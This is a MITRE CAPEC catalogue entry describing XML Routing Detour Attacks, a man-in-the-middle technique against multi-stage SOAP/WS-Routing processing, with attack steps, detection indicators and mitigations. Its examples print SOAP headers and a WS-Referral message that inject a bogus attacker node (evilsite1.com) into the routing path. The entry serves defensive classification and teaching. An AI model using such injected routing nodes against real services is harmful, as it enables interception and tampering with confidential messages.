CAPEC - CAPEC-219: XML Routing Detour Attacks (Release 2.0)

Home > CAPEC List > CAPEC-219: XML Routing Detour Attacks (Release 2.0)

CAPEC List
Full CAPEC Dictionary
Methods of Attack View
Reports

About CAPEC
Documents
Resources

Community
Related Activities
Collaboration List
T-Shirt
Contact Us

News & Events
Calendar
Free Newsletter

Compatibility
Program
Requirements
Participants
Make a Declaration

Search the Site

CAPEC-219: XML Routing Detour Attacks

XML Routing Detour Attacks

Attack Pattern ID: 219 (Standard Attack Pattern Completeness: Complete)

Typical Severity: Medium

Status: Draft

Description

Summary

An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.

Attack Execution Flow

Explore

Survey the target:

Using command line or an automated tool, an attacker records all instances of web services to process XML requests.

Attack Step Techniques

ID	Attack Step Technique Description	Environments
1	Use automated tool to record all instances to process XML requests or find exposed WSDL.	env-Web env-ClientServer
2	Use tools to crawl WSDL	env-Web env-ClientServer

Indicators

ID	Type	Indicator Description	Environments
1	Positive	The URL processes XML requests.	env-Web env-ClientServer
2	Inconclusive	The application does not accept XML requests.	env-Web env-ClientServer

Experiment

Identify SOAP messages that have multiple state processing.:

Inspect instance to see whether the XML processing has multiple stages or not.

Attack Step Techniques

ID	Attack Step Technique Description	Environments
1	Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.	env-Web env-ClientServer

Indicators

ID	Type	Indicator Description	Environments
1	Positive	The SOAP message has multiple stage processing.	env-Web env-ClientServer
2	Negative	The SOAP message does not have intermediate nodes.	env-Web env-ClientServer

Outcomes

ID	Type	Outcome Description
1	Success	A list of URLs which have multiple stages to process XML contents.

Security Controls

ID	Type	Security Control Description
1	Detective	Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).

Exploit

Launch a XML routing detour attack:

The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

Attack Step Techniques

ID	Attack Step Technique Description	Environments
1	The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message	env-Web env-ClientServer

Outcomes

ID	Type	Outcome Description
1	Success	The XML message is routed to the attacker controlled node.

Security Controls

ID	Type	Security Control Description
1	Preventative	Use SSL for connections between all parties with mutual authentication.

Attack Prerequisites

The targeted system must have multiple stages processing of XML content.

Typical Likelihood of Exploit

Likelihood: High

Methods of Attack

Protocol Manipulation
Injection

Examples-Instances

Description

Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction). Example SOAP message with routing information in header: <S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope> Add an additional node (example3.com/router) to the XML path in a WS-Referral message <r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://example3.com/router</r:via> </r:go> </r:ref> Resulting in the following SOAP Header: <S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope> In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted. Example of WS-Referral based WS-Routing injection of the bogus node route: <r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://evilsite1.com/router</r:via> </r:go> </r:ref> Resulting XML Routing Detour attack: <S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example_0.com/</m:action> <m:to>http://example_4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://evilesite1.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope> Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).

Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

To inject a bogus node in the XML routing table

Resources Required

The attacker must be able to insert or compromise a system into the processing path for the transaction.

Solutions and Mitigations

Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.

Implementation: Use SSL for connections between all parties with mutual authentication.

Attack Motivation-Consequences

Scope	Technical Impact	Note
Integrity	Modify application data
Confidentiality	Read application data
Accountability Authentication Authorization Non-Repudiation	Gain privileges / assume identity
Access_Control Authorization	Bypass protection mechanism

Injection Vector

The routing table of the XML Header

Payload

The bogus routing node in the routing table of XML header

Activation Zone

The route between the XML message sender and receiver.

Payload Activation Impact

Description

Information Leakage

Related Attack Patterns

Nature	Type	ID	Name	Description	View(s) this relationship pertains to
ChildOf	Attack Pattern	94	Man in the Middle Attack	http://capec.mitre.org/data/definitions/94.html	Mechanism of Attack (primary)1000
ChildOf	Category	377	WASC Threat Classification 2.0 - WASC-44 - XML Entity Expansion	http://capec.mitre.org/data/definitions/365.html	WASC Threat Classification 2.0 (primary)333

Purposes

Exploitation

CIA Impact

Confidentiality Impact: High

Integrity Impact: Medium

Availability Impact: Low

Technical Context

Architectural Paradigms	Client-Server
Frameworks	All
Platforms	All

References

" WASC Threat Classification WSAC32: Routing Detour". <http://projects.webappsec.org/w/page/13246956/Routing-Detour>.

Andre Yee. "Threat Protection in a Service Oriented World". NFR Security. <http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf>.

Pete Lindstrom. "Attacking and Defending Web Services". <http://www.forumsys.com/resources/resources/whitepapers/Attacking_and_Defending_WS.pdf>.

Content History

Modifications
Modifier	Organization	Comments
Min Xu	Cigital, Inc.	Pre-review - 0.1
Romain Gaucher	Cigital, Inc.	Performed a review of content and added additional content

Page Last Updated: May 18, 2012


	CAPEC is co-sponsored by the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. This Web site is sponsored and managed by The MITRE Corporation to enable stakeholder collaboration. Copyright © 2007 - 2013, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation. Contact capec@mitre.org for more information.	Privacy policy Terms of use Contact us

Common Attack Pattern Enumeration and Classification

CAPEC-219: XML Routing Detour Attacks